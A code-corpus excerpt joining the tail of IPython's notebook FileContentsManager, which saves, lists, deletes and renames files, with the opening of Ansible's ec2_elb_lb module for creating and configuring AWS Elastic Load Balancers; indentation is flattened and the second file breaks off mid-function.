def _post_save_script(model, os_path, contents_manager, **kwargs):
"""convert notebooks to Python script after save with nbconvert
replaces `ipython notebook --script`
"""
from IPython.nbconvert.exporters.script import ScriptExporter
if model['type'] != 'notebook':
return
global _script_exporter
if _script_exporter is None:
_script_exporter = ScriptExporter(parent=contents_manager)
log = contents_manager.log
base, ext = os.path.splitext(os_path)
py_fname = base + '.py'
script, resources = _script_exporter.from_filename(os_path)
script_fname = base + resources.get('output_extension', '.txt')
log.info("Saving script /%s", to_api_path(script_fname, contents_manager.root_dir))
with io.open(script_fname, 'w', encoding='utf-8') as f:
f.write(script)
class FileContentsManager(FileManagerMixin, ContentsManager):
root_dir = Unicode(config=True)
def _root_dir_default(self):
try:
return self.parent.notebook_dir
except AttributeError:
return getcwd()
save_script = Bool(False, config=True, help='DEPRECATED, use post_save_hook')
def _save_script_changed(self):
self.log.warn("""
`--script` is deprecated. You can trigger nbconvert via pre- or post-save hooks:
ContentsManager.pre_save_hook
FileContentsManager.post_save_hook
A post-save hook has been registered that calls:
ipython nbconvert --to script [notebook]
which behaves similarly to `--script`.
""")
self.post_save_hook = _post_save_script
post_save_hook = Any(None, config=True,
help="""Python callable or importstring thereof
to be called on the path of a file just saved.
This can be used to process the file on disk,
such as converting the notebook to a script or HTML via nbconvert.
It will be called as (all arguments passed by keyword)::
hook(os_path=os_path, model=model, contents_manager=instance)
- path: the filesystem path to the file just written
- model: the model representing the file
- contents_manager: this ContentsManager instance
"""
)
def _post_save_hook_changed(self, name, old, new):
if new and isinstance(new, string_types):
self.post_save_hook = import_item(self.post_save_hook)
elif new:
if not callable(new):
raise TraitError("post_save_hook must be callable")
def run_post_save_hook(self, model, os_path):
"""Run the post-save hook if defined, and log errors"""
if self.post_save_hook:
try:
self.log.debug("Running post-save hook on %s", os_path)
self.post_save_hook(os_path=os_path, model=model, contents_manager=self)
except Exception:
self.log.error("Post-save hook failed on %s", os_path, exc_info=True)
def _root_dir_changed(self, name, old, new):
"""Do a bit of validation of the root_dir."""
if not os.path.isabs(new):
# If we receive a non-absolute path, make it absolute.
self.root_dir = os.path.abspath(new)
return
if not os.path.isdir(new):
raise TraitError("%r is not a directory" % new)
def _checkpoints_class_default(self):
return FileCheckpoints
def is_hidden(self, path):
"""Does the API style path correspond to a hidden directory or file?
Parameters
----------
path : string
The path to check. This is an API path (`/` separated,
relative to root_dir).
Returns
-------
hidden : bool
Whether the path exists and is hidden.
"""
path = path.strip('/')
os_path = self._get_os_path(path=path)
return is_hidden(os_path, self.root_dir)
def file_exists(self, path):
"""Returns True if the file exists, else returns False.
API-style wrapper for os.path.isfile
Parameters
----------
path : string
The relative path to the file (with '/' as separator)
Returns
-------
exists : bool
Whether the file exists.
"""
path = path.strip('/')
os_path = self._get_os_path(path)
return os.path.isfile(os_path)
def dir_exists(self, path):
"""Does the API-style path refer to an extant directory?
API-style wrapper for os.path.isdir
Parameters
----------
path : string
The path to check. This is an API path (`/` separated,
relative to root_dir).
Returns
-------
exists : bool
Whether the path is indeed a directory.
"""
path = path.strip('/')
os_path = self._get_os_path(path=path)
return os.path.isdir(os_path)
def exists(self, path):
"""Returns True if the path exists, else returns False.
API-style wrapper for os.path.exists
Parameters
----------
path : string
The API path to the file (with '/' as separator)
Returns
-------
exists : bool
Whether the target exists.
"""
path = path.strip('/')
os_path = self._get_os_path(path=path)
return os.path.exists(os_path)
def _base_model(self, path):
"""Build the common base of a contents model"""
os_path = self._get_os_path(path)
info = os.stat(os_path)
last_modified = tz.utcfromtimestamp(info.st_mtime)
created = tz.utcfromtimestamp(info.st_ctime)
# Create the base model.
model = {}
model['name'] = path.rsplit('/', 1)[-1]
model['path'] = path
model['last_modified'] = last_modified
model['created'] = created
model['content'] = None
model['format'] = None
model['mimetype'] = None
try:
model['writable'] = os.access(os_path, os.W_OK)
except OSError:
self.log.error("Failed to check write permissions on %s", os_path)
model['writable'] = False
return model
def _dir_model(self, path, content=True):
"""Build a model for a directory
if content is requested, will include a listing of the directory
"""
os_path = self._get_os_path(path)
four_o_four = u'directory does not exist: %r' % path
if not os.path.isdir(os_path):
raise web.HTTPError(404, four_o_four)
elif is_hidden(os_path, self.root_dir):
self.log.info("Refusing to serve hidden directory %r, via 404 Error",
os_path
)
raise web.HTTPError(404, four_o_four)
model = self._base_model(path)
model['type'] = 'directory'
if content:
model['content'] = contents = []
os_dir = self._get_os_path(path)
for name in os.listdir(os_dir):
os_path = os.path.join(os_dir, name)
# skip over broken symlinks in listing
if not os.path.exists(os_path):
self.log.warn("%s doesn't exist", os_path)
continue
elif not os.path.isfile(os_path) and not os.path.isdir(os_path):
self.log.debug("%s not a regular file", os_path)
continue
if self.should_list(name) and not is_hidden(os_path, self.root_dir):
contents.append(self.get(
path='%s/%s' % (path, name),
content=False)
)
model['format'] = 'json'
return model
def _file_model(self, path, content=True, format=None):
"""Build a model for a file
if content is requested, include the file contents.
format:
If 'text', the contents will be decoded as UTF-8.
If 'base64', the raw bytes contents will be encoded as base64.
If not specified, try to decode as UTF-8, and fall back to base64
"""
model = self._base_model(path)
model['type'] = 'file'
os_path = self._get_os_path(path)
if content:
content, format = self._read_file(os_path, format)
default_mime = {
'text': 'text/plain',
'base64': 'application/octet-stream'
}[format]
model.update(
content=content,
format=format,
mimetype=mimetypes.guess_type(os_path)[0] or default_mime,
)
return model
def _notebook_model(self, path, content=True):
"""Build a notebook model
if content is requested, the notebook content will be populated
as a JSON structure (not double-serialized)
"""
model = self._base_model(path)
model['type'] = 'notebook'
if content:
os_path = self._get_os_path(path)
nb = self._read_notebook(os_path, as_version=4)
self.mark_trusted_cells(nb, path)
model['content'] = nb
model['format'] = 'json'
self.validate_notebook_model(model)
return model
def get(self, path, content=True, type=None, format=None):
""" Takes a path for an entity and returns its model
Parameters
----------
path : str
the API path that describes the relative path for the target
content : bool
Whether to include the contents in the reply
type : str, optional
The requested type - 'file', 'notebook', or 'directory'.
Will raise HTTPError 400 if the content doesn't match.
format : str, optional
The requested format for file contents. 'text' or 'base64'.
Ignored if this returns a notebook or directory model.
Returns
-------
model : dict
the contents model. If content=True, returns the contents
of the file or directory as well.
"""
path = path.strip('/')
if not self.exists(path):
raise web.HTTPError(404, u'No such file or directory: %s' % path)
os_path = self._get_os_path(path)
if os.path.isdir(os_path):
if type not in (None, 'directory'):
raise web.HTTPError(400,
u'%s is a directory, not a %s' % (path, type), reason='bad type')
model = self._dir_model(path, content=content)
elif type == 'notebook' or (type is None and path.endswith('.ipynb')):
model = self._notebook_model(path, content=content)
else:
if type == 'directory':
raise web.HTTPError(400,
u'%s is not a directory' % path, reason='bad type')
model = self._file_model(path, content=content, format=format)
return model
def _save_directory(self, os_path, model, path=''):
"""create a directory"""
if is_hidden(os_path, self.root_dir):
raise web.HTTPError(400, u'Cannot create hidden directory %r' % os_path)
if not os.path.exists(os_path):
with self.perm_to_403():
os.mkdir(os_path)
elif not os.path.isdir(os_path):
raise web.HTTPError(400, u'Not a directory: %s' % (os_path))
else:
self.log.debug("Directory %r already exists", os_path)
def save(self, model, path=''):
"""Save the file model and return the model with no content."""
path = path.strip('/')
if 'type' not in model:
raise web.HTTPError(400, u'No file type provided')
if 'content' not in model and model['type'] != 'directory':
raise web.HTTPError(400, u'No file content provided')
os_path = self._get_os_path(path)
self.log.debug("Saving %s", os_path)
self.run_pre_save_hook(model=model, path=path)
try:
if model['type'] == 'notebook':
nb = nbformat.from_dict(model['content'])
self.check_and_sign(nb, path)
self._save_notebook(os_path, nb)
# One checkpoint should always exist for notebooks.
if not self.checkpoints.list_checkpoints(path):
self.create_checkpoint(path)
elif model['type'] == 'file':
# Missing format will be handled internally by _save_file.
self._save_file(os_path, model['content'], model.get('format'))
elif model['type'] == 'directory':
self._save_directory(os_path, model, path)
else:
raise web.HTTPError(400, "Unhandled contents type: %s" % model['type'])
except web.HTTPError:
raise
except Exception as e:
self.log.error(u'Error while saving file: %s %s', path, e, exc_info=True)
raise web.HTTPError(500, u'Unexpected error while saving file: %s %s' % (path, e))
validation_message = None
if model['type'] == 'notebook':
self.validate_notebook_model(model)
validation_message = model.get('message', None)
model = self.get(path, content=False)
if validation_message:
model['message'] = validation_message
self.run_post_save_hook(model=model, os_path=os_path)
return model
def delete_file(self, path):
"""Delete file at path."""
path = path.strip('/')
os_path = self._get_os_path(path)
rm = os.unlink
if os.path.isdir(os_path):
listing = os.listdir(os_path)
# Don't delete non-empty directories.
# A directory containing only leftover checkpoints is
# considered empty.
cp_dir = getattr(self.checkpoints, 'checkpoint_dir', None)
for entry in listing:
if entry != cp_dir:
raise web.HTTPError(400, u'Directory %s not empty' % os_path)
elif not os.path.isfile(os_path):
raise web.HTTPError(404, u'File does not exist: %s' % os_path)
if os.path.isdir(os_path):
self.log.debug("Removing directory %s", os_path)
with self.perm_to_403():
shutil.rmtree(os_path)
else:
self.log.debug("Unlinking file %s", os_path)
with self.perm_to_403():
rm(os_path)
def rename_file(self, old_path, new_path):
"""Rename a file."""
old_path = old_path.strip('/')
new_path = new_path.strip('/')
if new_path == old_path:
return
new_os_path = self._get_os_path(new_path)
old_os_path = self._get_os_path(old_path)
# Should we proceed with the move?
if os.path.exists(new_os_path):
raise web.HTTPError(409, u'File already exists: %s' % new_path)
# Move the file
try:
with self.perm_to_403():
shutil.move(old_os_path, new_os_path)
except web.HTTPError:
raise
except Exception as e:
raise web.HTTPError(500, u'Unknown error renaming file: %s %s' % (old_path, e))
def info_string(self):
return "Serving notebooks from local directory: %s" % self.root_dir
def get_kernel_path(self, path, model=None):
"""Return the initial API path of a kernel associated with a given notebook"""
if '/' in path:
parent_dir = path.rsplit('/', 1)[0]
else:
parent_dir = ''
return parent_dir
|
madelynfreed/rlundo
|
venv/lib/python2.7/site-packages/IPython/html/services/contents/filemanager.py
|
Python
|
gpl-3.0
| 16,487
|
#!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['stableinterface'],
'supported_by': 'curated'}
DOCUMENTATION = """
---
module: ec2_elb_lb
description:
- Returns information about the load balancer.
- Will be marked changed when called only if state is changed.
short_description: Creates or destroys Amazon ELB.
version_added: "1.5"
author:
- "Jim Dalton (@jsdalton)"
options:
state:
description:
- Create or destroy the ELB
choices: ["present", "absent"]
required: true
name:
description:
- The name of the ELB
required: true
listeners:
description:
- List of ports/protocols for this ELB to listen on (see example)
required: false
purge_listeners:
description:
- Purge existing listeners on ELB that are not found in listeners
required: false
default: true
instance_ids:
description:
- List of instance ids to attach to this ELB
required: false
default: false
version_added: "2.1"
purge_instance_ids:
description:
- Purge existing instance ids on ELB that are not found in instance_ids
required: false
default: false
version_added: "2.1"
zones:
description:
- List of availability zones to enable on this ELB
required: false
purge_zones:
description:
- Purge existing availability zones on ELB that are not found in zones
required: false
default: false
security_group_ids:
description:
- A list of security groups to apply to the elb
required: false
default: None
version_added: "1.6"
security_group_names:
description:
- A list of security group names to apply to the elb
required: false
default: None
version_added: "2.0"
health_check:
description:
- An associative array of health check configuration settings (see example)
required: false
default: None
access_logs:
description:
- An associative array of access logs configuration settings (see example)
required: false
default: None
version_added: "2.0"
subnets:
description:
- A list of VPC subnets to use when creating ELB. Zones should be empty if using this.
required: false
default: None
aliases: []
version_added: "1.7"
purge_subnets:
description:
- Purge existing subnet on ELB that are not found in subnets
required: false
default: false
version_added: "1.7"
scheme:
description:
- The scheme to use when creating the ELB. For a private VPC-visible ELB use 'internal'.
required: false
default: 'internet-facing'
version_added: "1.7"
validate_certs:
description:
- When set to "no", SSL certificates will not be validated for boto versions >= 2.6.0.
required: false
default: "yes"
choices: ["yes", "no"]
aliases: []
version_added: "1.5"
connection_draining_timeout:
description:
- Wait a specified timeout allowing connections to drain before terminating an instance
required: false
aliases: []
version_added: "1.8"
idle_timeout:
description:
- ELB connections from clients and to servers are timed out after this amount of time
required: false
version_added: "2.0"
cross_az_load_balancing:
description:
- Distribute load across all configured Availability Zones
required: false
default: "no"
choices: ["yes", "no"]
aliases: []
version_added: "1.8"
stickiness:
description:
- An associative array of stickiness policy settings. Policy will be applied to all listeners ( see example )
required: false
version_added: "2.0"
wait:
description:
- When specified, Ansible will check the status of the load balancer to ensure it has been successfully
removed from AWS.
required: false
default: no
choices: ["yes", "no"]
version_added: "2.1"
wait_timeout:
description:
- Used in conjunction with wait. Number of seconds to wait for the elb to be terminated.
A maximum of 600 seconds (10 minutes) is allowed.
required: false
default: 60
version_added: "2.1"
tags:
description:
- An associative array of tags. To delete all tags, supply an empty dict.
required: false
version_added: "2.1"
extends_documentation_fragment:
- aws
- ec2
"""
EXAMPLES = """
# Note: None of these examples set aws_access_key, aws_secret_key, or region.
# It is assumed that their matching environment variables are set.
# Basic provisioning example (non-VPC)
- local_action:
module: ec2_elb_lb
name: "test-please-delete"
state: present
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http # options are http, https, ssl, tcp
load_balancer_port: 80
instance_port: 80
proxy_protocol: True
- protocol: https
load_balancer_port: 443
instance_protocol: http # optional, defaults to value of protocol setting
instance_port: 80
# ssl certificate required for https or ssl
ssl_certificate_id: "arn:aws:iam::123456789012:server-certificate/company/servercerts/ProdServerCert"
# Internal ELB example
- local_action:
module: ec2_elb_lb
name: "test-vpc"
scheme: internal
state: present
instance_ids:
- i-abcd1234
purge_instance_ids: true
subnets:
- subnet-abcd1234
- subnet-1a2b3c4d
listeners:
- protocol: http # options are http, https, ssl, tcp
load_balancer_port: 80
instance_port: 80
# Configure a health check and the access logs
- local_action:
module: ec2_elb_lb
name: "test-please-delete"
state: present
zones:
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
health_check:
ping_protocol: http # options are http, https, ssl, tcp
ping_port: 80
ping_path: "/index.html" # not required for tcp or ssl
response_timeout: 5 # seconds
interval: 30 # seconds
unhealthy_threshold: 2
healthy_threshold: 10
access_logs:
interval: 5 # minutes (defaults to 60)
s3_location: "my-bucket" # This value is required if access_logs is set
s3_prefix: "logs"
# Ensure ELB is gone
- local_action:
module: ec2_elb_lb
name: "test-please-delete"
state: absent
# Ensure ELB is gone and wait for check (for default timeout)
- local_action:
module: ec2_elb_lb
name: "test-please-delete"
state: absent
wait: yes
# Ensure ELB is gone and wait for check with timeout value
- local_action:
module: ec2_elb_lb
name: "test-please-delete"
state: absent
wait: yes
wait_timeout: 600
# Normally, this module will purge any listeners that exist on the ELB
# but aren't specified in the listeners parameter. If purge_listeners is
# false it leaves them alone
- local_action:
module: ec2_elb_lb
name: "test-please-delete"
state: present
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
purge_listeners: no
# Normally, this module will leave availability zones that are enabled
# on the ELB alone. If purge_zones is true, then any extraneous zones
# will be removed
- local_action:
module: ec2_elb_lb
name: "test-please-delete"
state: present
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
purge_zones: yes
# Creates a ELB and assigns a list of subnets to it.
- local_action:
module: ec2_elb_lb
state: present
name: 'New ELB'
security_group_ids: 'sg-123456, sg-67890'
region: us-west-2
subnets: 'subnet-123456,subnet-67890'
purge_subnets: yes
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
# Create an ELB with connection draining, increased idle timeout and cross availability
# zone load balancing
- local_action:
module: ec2_elb_lb
name: "New ELB"
state: present
connection_draining_timeout: 60
idle_timeout: 300
cross_az_load_balancing: "yes"
region: us-east-1
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
# Create an ELB with load balancer stickiness enabled
- local_action:
module: ec2_elb_lb
name: "New ELB"
state: present
region: us-east-1
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
stickiness:
type: loadbalancer
enabled: yes
expiration: 300
# Create an ELB with application stickiness enabled
- local_action:
module: ec2_elb_lb
name: "New ELB"
state: present
region: us-east-1
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
stickiness:
type: application
enabled: yes
cookie: SESSIONID
# Create an ELB and add tags
- local_action:
module: ec2_elb_lb
name: "New ELB"
state: present
region: us-east-1
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
tags:
Name: "New ELB"
stack: "production"
client: "Bob"
# Delete all tags from an ELB
- local_action:
module: ec2_elb_lb
name: "New ELB"
state: present
region: us-east-1
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
tags: {}
"""
try:
import boto
import boto.ec2.elb
import boto.ec2.elb.attributes
import boto.vpc
from boto.ec2.elb.healthcheck import HealthCheck
from boto.ec2.tag import Tag
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
import time
import traceback
import random
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ec2 import ec2_argument_spec, connect_to_aws, AnsibleAWSError
from ansible.module_utils.ec2 import get_aws_connection_info
def _throttleable_operation(max_retries):
def _operation_wrapper(op):
def _do_op(*args, **kwargs):
retry = 0
while True:
try:
return op(*args, **kwargs)
except boto.exception.BotoServerError as e:
if retry < max_retries and e.code in \
("Throttling", "RequestLimitExceeded"):
retry = retry + 1
time.sleep(min(random.random() * (2 ** retry), 300))
continue
else:
raise
return _do_op
return _operation_wrapper
def _get_vpc_connection(module, region, aws_connect_params):
try:
return connect_to_aws(boto.vpc, region, **aws_connect_params)
except (boto.exception.NoAuthHandlerFound, AnsibleAWSError) as e:
module.fail_json(msg=str(e))
_THROTTLING_RETRIES = 5
class ElbManager(object):
"""Handles ELB creation and destruction"""
def __init__(self, module, name, listeners=None, purge_listeners=None,
zones=None, purge_zones=None, security_group_ids=None,
health_check=None, subnets=None, purge_subnets=None,
scheme="internet-facing", connection_draining_timeout=None,
idle_timeout=None,
cross_az_load_balancing=None, access_logs=None,
stickiness=None, wait=None, wait_timeout=None, tags=None,
region=None,
instance_ids=None, purge_instance_ids=None, **aws_connect_params):
self.module = module
self.name = name
self.listeners = listeners
self.purge_listeners = purge_listeners
self.instance_ids = instance_ids
self.purge_instance_ids = purge_instance_ids
self.zones = zones
self.purge_zones = purge_zones
self.security_group_ids = security_group_ids
self.health_check = health_check
self.subnets = subnets
self.purge_subnets = purge_subnets
self.scheme = scheme
self.connection_draining_timeout = connection_draining_timeout
self.idle_timeout = idle_timeout
self.cross_az_load_balancing = cross_az_load_balancing
self.access_logs = access_logs
self.stickiness = stickiness
self.wait = wait
self.wait_timeout = wait_timeout
self.tags = tags
self.aws_connect_params = aws_connect_params
self.region = region
self.changed = False
self.status = 'gone'
self.elb_conn = self._get_elb_connection()
try:
self.elb = self._get_elb()
except boto.exception.BotoServerError as e:
module.fail_json(msg='unable to get all load balancers: %s' % e.message, exception=traceback.format_exc())
self.ec2_conn = self._get_ec2_connection()
@_throttleable_operation(_THROTTLING_RETRIES)
def ensure_ok(self):
"""Create the ELB"""
if not self.elb:
# Zones and listeners will be added at creation
self._create_elb()
else:
self._set_zones()
self._set_security_groups()
self._set_elb_listeners()
self._set_subnets()
self._set_health_check()
# boto has introduced support for some ELB attributes in
# different versions, so we check first before trying to
# set them to avoid errors
if self._check_attribute_support('connection_draining'):
self._set_connection_draining_timeout()
if self._check_attribute_support('connecting_settings'):
self._set_idle_timeout()
if self._check_attribute_support('cross_zone_load_balancing'):
self._set_cross_az_load_balancing()
if self._check_attribute_support('access_log'):
self._set_access_log()
# add sitcky options
self.select_stickiness_policy()
# ensure backend server policies are correct
self._set_backend_policies()
# set/remove instance ids
self._set_instance_ids()
self._set_tags()
def ensure_gone(self):
"""Destroy the ELB"""
if self.elb:
self._delete_elb()
if self.wait:
elb_removed = self._wait_for_elb_removed()
# Unfortunately even though the ELB itself is removed quickly
# the interfaces take longer so reliant security groups cannot
# be deleted until the interface has registered as removed.
elb_interface_removed = self._wait_for_elb_interface_removed()
if not (elb_removed and elb_interface_removed):
self.module.fail_json(msg='Timed out waiting for removal of load balancer.')
def get_info(self):
try:
check_elb = self.elb_conn.get_all_load_balancers(self.name)[0]
except:
check_elb = None
if not check_elb:
info = {
'name': self.name,
'status': self.status,
'region': self.region
}
else:
try:
lb_cookie_policy = check_elb.policies.lb_cookie_stickiness_policies[0].__dict__['policy_name']
except:
lb_cookie_policy = None
try:
app_cookie_policy = check_elb.policies.app_cookie_stickiness_policies[0].__dict__['policy_name']
except:
app_cookie_policy = None
info = {
'name': check_elb.name,
'dns_name': check_elb.dns_name,
'zones': check_elb.availability_zones,
'security_group_ids': check_elb.security_groups,
'status': self.status,
'subnets': self.subnets,
'scheme': check_elb.scheme,
'hosted_zone_name': check_elb.canonical_hosted_zone_name,
'hosted_zone_id': check_elb.canonical_hosted_zone_name_id,
'lb_cookie_policy': lb_cookie_policy,
'app_cookie_policy': app_cookie_policy,
'proxy_policy': self._get_proxy_protocol_policy(),
'backends': self._get_backend_policies(),
'instances': [instance.id for instance in check_elb.instances],
'out_of_service_count': 0,
'in_service_count': 0,
'unknown_instance_state_count': 0,
'region': self.region
}
# status of instances behind the ELB
if info['instances']:
info['instance_health'] = [ dict(
instance_id = instance_state.instance_id,
reason_code = instance_state.reason_code,
state = instance_state.state
) for instance_state in self.elb_conn.describe_instance_health(self.name)]
else:
info['instance_health'] = []
# instance state counts: InService or OutOfService
if info['instance_health']:
for instance_state in info['instance_health']:
if instance_state['state'] == "InService":
info['in_service_count'] += 1
elif instance_state['state'] == "OutOfService":
info['out_of_service_count'] += 1
else:
info['unknown_instance_state_count'] += 1
if check_elb.health_check:
info['health_check'] = {
'target': check_elb.health_check.target,
'interval': check_elb.health_check.interval,
'timeout': check_elb.health_check.timeout,
'healthy_threshold': check_elb.health_check.healthy_threshold,
'unhealthy_threshold': check_elb.health_check.unhealthy_threshold,
}
if check_elb.listeners:
info['listeners'] = [self._api_listener_as_tuple(l)
for l in check_elb.listeners]
elif self.status == 'created':
# When creating a new ELB, listeners don't show in the
# immediately returned result, so just include the
# ones that were added
info['listeners'] = [self._listener_as_tuple(l)
for l in self.listeners]
else:
info['listeners'] = []
if self._check_attribute_support('connection_draining'):
info['connection_draining_timeout'] = int(self.elb_conn.get_lb_attribute(self.name, 'ConnectionDraining').timeout)
if self._check_attribute_support('connecting_settings'):
info['idle_timeout'] = self.elb_conn.get_lb_attribute(self.name, 'ConnectingSettings').idle_timeout
if self._check_attribute_support('cross_zone_load_balancing'):
is_cross_az_lb_enabled = self.elb_conn.get_lb_attribute(self.name, 'CrossZoneLoadBalancing')
if is_cross_az_lb_enabled:
info['cross_az_load_balancing'] = 'yes'
else:
info['cross_az_load_balancing'] = 'no'
# return stickiness info?
info['tags'] = self.tags
return info
@_throttleable_operation(_THROTTLING_RETRIES)
def _wait_for_elb_removed(self):
polling_increment_secs = 15
max_retries = (self.wait_timeout / polling_increment_secs)
status_achieved = False
for x in range(0, max_retries):
try:
self.elb_conn.get_all_lb_attributes(self.name)
except (boto.exception.BotoServerError, StandardError) as e:
if "LoadBalancerNotFound" in e.code:
status_achieved = True
break
else:
time.sleep(polling_increment_secs)
return status_achieved
@_throttleable_operation(_THROTTLING_RETRIES)
def _wait_for_elb_interface_removed(self):
polling_increment_secs = 15
max_retries = (self.wait_timeout / polling_increment_secs)
status_achieved = False
elb_interfaces = self.ec2_conn.get_all_network_interfaces(
filters={'attachment.instance-owner-id': 'amazon-elb',
'description': 'ELB {0}'.format(self.name) })
for x in range(0, max_retries):
for interface in elb_interfaces:
try:
result = self.ec2_conn.get_all_network_interfaces(interface.id)
if result == []:
status_achieved = True
break
else:
time.sleep(polling_increment_secs)
except (boto.exception.BotoServerError, StandardError) as e:
if 'InvalidNetworkInterfaceID' in e.code:
status_achieved = True
break
else:
self.module.fail_json(msg=str(e))
return status_achieved
@_throttleable_operation(_THROTTLING_RETRIES)
def _get_elb(self):
elbs = self.elb_conn.get_all_load_balancers()
for elb in elbs:
if self.name == elb.name:
self.status = 'ok'
return elb
def _get_elb_connection(self):
try:
return connect_to_aws(boto.ec2.elb, self.region,
**self.aws_connect_params)
except (boto.exception.NoAuthHandlerFound, AnsibleAWSError) as e:
self.module.fail_json(msg=str(e))
def _get_ec2_connection(self):
try:
return connect_to_aws(boto.ec2, self.region,
**self.aws_connect_params)
except (boto.exception.NoAuthHandlerFound, StandardError) as e:
self.module.fail_json(msg=str(e))
@_throttleable_operation(_THROTTLING_RETRIES)
def _delete_elb(self):
# True if succeeds, exception raised if not
result = self.elb_conn.delete_load_balancer(name=self.name)
if result:
self.changed = True
self.status = 'deleted'
def _create_elb(self):
listeners = [self._listener_as_tuple(l) for l in self.listeners]
self.elb = self.elb_conn.create_load_balancer(name=self.name,
zones=self.zones,
security_groups=self.security_group_ids,
complex_listeners=listeners,
subnets=self.subnets,
scheme=self.scheme)
if self.elb:
# HACK: Work around a boto bug in which the listeners attribute is
# always set to the listeners argument to create_load_balancer, and
# not the complex_listeners
# We're not doing a self.elb = self._get_elb here because there
# might be eventual consistency issues and it doesn't necessarily
# make sense to wait until the ELB gets returned from the EC2 API.
# This is necessary in the event we hit the throttling errors and
# need to retry ensure_ok
# See https://github.com/boto/boto/issues/3526
self.elb.listeners = self.listeners
self.changed = True
self.status = 'created'
def _create_elb_listeners(self, listeners):
"""Takes a list of listener tuples and creates them"""
# True if succeeds, exception raised if not
self.changed = self.elb_conn.create_load_balancer_listeners(self.name,
complex_listeners=listeners)
def _delete_elb_listeners(self, listeners):
"""Takes a list of listener tuples and deletes them from the elb"""
ports = [l[0] for l in listeners]
# True if succeeds, exception raised if not
self.changed = self.elb_conn.delete_load_balancer_listeners(self.name,
ports)
def _set_elb_listeners(self):
"""
Creates listeners specified by self.listeners; overwrites existing
listeners on these ports; removes extraneous listeners
"""
listeners_to_add = []
listeners_to_remove = []
listeners_to_keep = []
# Check for any listeners we need to create or overwrite
for listener in self.listeners:
listener_as_tuple = self._listener_as_tuple(listener)
# First we loop through existing listeners to see if one is
# already specified for this port
existing_listener_found = None
for existing_listener in self.elb.listeners:
# Since ELB allows only one listener on each incoming port, a
# single match on the incoming port is all we're looking for
if existing_listener[0] == int(listener['load_balancer_port']):
existing_listener_found = self._api_listener_as_tuple(existing_listener)
break
if existing_listener_found:
# Does it match exactly?
if listener_as_tuple != existing_listener_found:
# The ports are the same but something else is different,
# so we'll remove the existing one and add the new one
listeners_to_remove.append(existing_listener_found)
listeners_to_add.append(listener_as_tuple)
else:
# We already have this listener, so we're going to keep it
listeners_to_keep.append(existing_listener_found)
else:
# We didn't find an existing listener, so just add the new one
listeners_to_add.append(listener_as_tuple)
# Check for any extraneous listeners we need to remove, if desired
if self.purge_listeners:
for existing_listener in self.elb.listeners:
existing_listener_tuple = self._api_listener_as_tuple(existing_listener)
if existing_listener_tuple in listeners_to_remove:
# Already queued for removal
continue
if existing_listener_tuple in listeners_to_keep:
# Keep this one around
continue
# Since we're not already removing it and we don't need to keep
# it, let's get rid of it
listeners_to_remove.append(existing_listener_tuple)
if listeners_to_remove:
self._delete_elb_listeners(listeners_to_remove)
if listeners_to_add:
self._create_elb_listeners(listeners_to_add)
def _api_listener_as_tuple(self, listener):
"""Adds ssl_certificate_id to ELB API tuple if present"""
base_tuple = listener.get_complex_tuple()
if listener.ssl_certificate_id and len(base_tuple) < 5:
return base_tuple + (listener.ssl_certificate_id,)
return base_tuple
def _listener_as_tuple(self, listener):
"""Formats listener as a 4- or 5-tuples, in the order specified by the
ELB API"""
# N.B. string manipulations on protocols below (str(), upper()) is to
# ensure format matches output from ELB API
listener_list = [
int(listener['load_balancer_port']),
int(listener['instance_port']),
str(listener['protocol'].upper()),
]
# Instance protocol is not required by ELB API; it defaults to match
# load balancer protocol. We'll mimic that behavior here
if 'instance_protocol' in listener:
listener_list.append(str(listener['instance_protocol'].upper()))
else:
listener_list.append(str(listener['protocol'].upper()))
if 'ssl_certificate_id' in listener:
listener_list.append(str(listener['ssl_certificate_id']))
return tuple(listener_list)
def _enable_zones(self, zones):
try:
self.elb.enable_zones(zones)
except boto.exception.BotoServerError as e:
self.module.fail_json(msg='unable to enable zones: %s' % e.message, exception=traceback.format_exc())
self.changed = True
def _disable_zones(self, zones):
try:
self.elb.disable_zones(zones)
except boto.exception.BotoServerError as e:
self.module.fail_json(msg='unable to disable zones: %s' % e.message, exception=traceback.format_exc())
self.changed = True
def _attach_subnets(self, subnets):
self.elb_conn.attach_lb_to_subnets(self.name, subnets)
self.changed = True
def _detach_subnets(self, subnets):
self.elb_conn.detach_lb_from_subnets(self.name, subnets)
self.changed = True
def _set_subnets(self):
"""Determine which subnets need to be attached or detached on the ELB"""
if self.subnets:
if self.purge_subnets:
subnets_to_detach = list(set(self.elb.subnets) - set(self.subnets))
subnets_to_attach = list(set(self.subnets) - set(self.elb.subnets))
else:
subnets_to_detach = None
subnets_to_attach = list(set(self.subnets) - set(self.elb.subnets))
if subnets_to_attach:
self._attach_subnets(subnets_to_attach)
if subnets_to_detach:
self._detach_subnets(subnets_to_detach)
def _set_zones(self):
"""Determine which zones need to be enabled or disabled on the ELB"""
if self.zones:
if self.purge_zones:
zones_to_disable = list(set(self.elb.availability_zones) -
set(self.zones))
zones_to_enable = list(set(self.zones) -
set(self.elb.availability_zones))
else:
zones_to_disable = None
zones_to_enable = list(set(self.zones) -
set(self.elb.availability_zones))
